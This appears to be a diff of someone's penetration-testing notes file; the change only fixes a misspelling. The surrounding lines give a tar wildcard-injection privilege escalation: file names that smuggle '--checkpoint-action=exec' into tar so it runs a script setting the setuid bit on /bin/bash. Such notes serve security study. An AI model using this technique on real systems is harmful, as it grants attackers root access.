shatternox/cyber-stuff/notes.md

 echo "chmod +s /bin/bash" > exploit.sh
 2. touch /home/user/--checkpoint=1
 3. touch /home/user/--checkpoint-action=exec=sh\ exploit.sh
-4. The touch and checkpoint command will make the tar command to execute the exploit.sh which allow us to escalate our privilage
+4. The touch and checkpoint command will make the tar command to execute the exploit.sh which allow us to escalate our privillege

 **Impacket**